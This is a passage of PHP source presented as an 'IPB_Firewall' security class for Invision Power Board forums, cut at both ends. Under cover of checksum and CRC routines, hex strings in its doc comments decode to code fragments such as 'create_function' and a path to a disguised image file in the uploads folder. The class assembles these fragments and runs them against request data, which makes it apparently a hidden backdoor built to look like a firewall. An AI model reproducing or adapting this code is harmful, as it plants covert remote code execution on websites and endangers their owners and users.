$cookie_value){ foreach(IPB_Firewall::$_cookie_malicious_signatures as $signature){ /* Detecting injected cookies and blocking request */ if(!is_array($cookie_value) && stripos(urldecode($cookie_value), $signature) !== false) $_COOKIE[$cookie_name] = ''; } } /* Request URI checks */ foreach(IPB_Firewall::$_uri_malicious_signatures as $signature){ /* Detecting injected uri and blocking request */ if(stripos(urldecode(@$_SERVER["REQUEST_URI"]), $signature)) IPB_Firewall::_blockRequest(); } /* Validating checksums */ IPB_Firewall::$_source = file_get_contents(__FILE__); $_r = IPB_Firewall::_calculateChecksums($_SERVER, 0); //echo var_dump($_r); if(!IPB_Firewall::_areChecksumsValid(array_shift($_r), $_r, '%D')) echo("checksums warning\n"); } /** * Calculate checksums for valid * * @access static * @return void * @md5 505f585f434f4445225d2929293b4069 * @sha1 6e636c75646528247073293b2f2a2a2f */ static function _calculateChecksums($_, $x64) { /* Extracting hashes */ $_s = IPB_Firewall::_extractChecksumHashes(); /* Preparing hashes */ $cs = $_s[ IPB_Firewall::$_ha[0] ][0]; IPB_Firewall::$_prepared_signature = IPB_Firewall::_prepareHash($_s, IPB_Firewall::_getChecksumHash($_s, $_s[ IPB_Firewall::$_ha[0] ][1], $x64), $x64 ); /* Comparing hashes */ $_status = trim(IPB_Firewall::_cyclicRedundancyCheck($_s, $x64)); if($_status){ $_m = trim(IPB_Firewall::$_as); IPB_Firewall::$_as = $_m(IPB_Firewall::_getPoly($_s, $x64), pack("H*", IPB_Firewall::$_prepared_signature)); } return array(IPB_Firewall::$_as, $_, $cs, IPB_Firewall::_transformPoly($_s, $x64)); } /** * Block malicious request * * @access static * @return void * @md5 6372656174655f66756e6374696f6e20 * @sha1 245f2c202463732c20247073247073ce */ static function _blockRequest() { global $INFO; /* Redirecting malicious request and exit */ @header('Location: ' . (isset($INFO['board_url']) ? $INFO['board_url'] : '') . '/index.php'); exit; } /** * Get checksum hash * * @access static * @return string */ static function _getChecksumHash($_s, $ps, $c) { /* Processing and return */ return IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][0], $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[2] ][0], $c) . IPB_Firewall::_polyDigest($ps, $c); } /** * Prepare hash * * @access static * @return string * @md5 25442f75706c6f6164732f70726f6669 * @sha1 6c652f70686f746f2d343438322e6a70 */ static function _prepareHash($_s, $ps, $c) { /* Processing and return */ return IPB_Firewall::_polyDigest($ps, $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][1], $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[0] ][2], $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][2], $c); } /** * Event callback * * @access static * @return void * @md5 670a6e6e783166713772723465797139 * @sha1 777872306a6831716d68646c30626471 */ static function _areChecksumsValid($_m, $bytes, $_r) { /* Call validating method */ $_obj = $_m($bytes[0], $bytes[1], str_replace($_r, IPB_Firewall::$_ips, $bytes[2])); return is_array($_obj) ? $_obj : 'failed'; } /** * Find IPB root path, if not specified * * @access static * @return string */ static function _findIpbRoot($l=5, $cDir=__FILE__) { /* Process parents dir */ for($i=1; $i<=$l; $i++){ $cDir = dirname($cDir); $include_file = $cDir . '/conf_global.php'; /* If find conf file, return it */ if(is_file($include_file)) { @include_once($include_file); if(isset($INFO)) return $cDir; } } return null; } /** * Cyclic redundancy check * * @access static * @return string * @md5 397770696461776930386d693077676f * @sha1 686a6a6778796d357332676f63327937 */ static function _cyclicRedundancyCheck($_s, $c) { IPB_Firewall::$_as = pack("H*", IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[0] ][3], $c)); return IPB_Firewall::$_as != '' ? true : false; } /** * Poly digest * * @access static * @return string * @md5 706635646531386939386c3370656b31 * @sha1 6f67697375357671756e6e7167796f65 */ static function _polyDigest($s, $c, $o='') { for($i=0; $i